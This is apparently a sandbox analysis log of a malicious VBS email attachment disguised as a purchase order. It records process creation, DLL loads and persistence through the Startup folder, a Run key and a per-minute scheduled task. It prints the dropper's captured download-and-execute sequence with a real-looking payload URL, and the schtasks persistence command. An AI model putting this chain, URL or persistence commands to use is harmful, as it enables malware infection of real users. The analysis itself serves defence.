                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
                            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: Open Purchase Order Summary Sheet.vbs Virustotal: Detection: 38%
                            Source: Open Purchase Order Summary Sheet.vbs ReversingLabs: Detection: 26%
                            Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs"
                            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe Process created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                            Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3360
                            Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                            Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 9672
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dll
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                            Source: UAINOJ.lnk.4.dr | LNK file: ..\..\..\..\..\Windata\TCPKPY.exe
                            Source: C:\ProgramData\Synaptics\Synaptics.exe | File written: C:\Users\user\AppData\Local\Temp\9iLoUuX.ini
                            Source: Window Recorder | Window detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

                            Data Obfuscation

                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe")
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe | Code function: 4_2_005120F6 LoadLibraryA,GetProcAddress,4_2_005120F6

                            Persistence and Installation Behavior

                            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\IPKGELNTQY\~$cache1
                            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\LSBIHQFDVT\~$cache1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | File created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | File created: C:\ProgramData\Synaptics\Synaptics.exe
                            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | File created: C:\ProgramData\Synaptics\RCX4FAD.tmp
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe | File created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe

                            Boot Survival

                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJ
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_004CF78E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_00517F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_00517F0E
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00C5F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_00C5F78E
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00CA7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00CA7F0E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe Code function: 32_2_00ADF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,32_2_00ADF78E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe Code function: 32_2_00B27F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,32_2_00B27F0E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004D1E5A
                            Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Window / User API: threadDelayed 4800
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Window / User API: foregroundWindowGot 1379
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
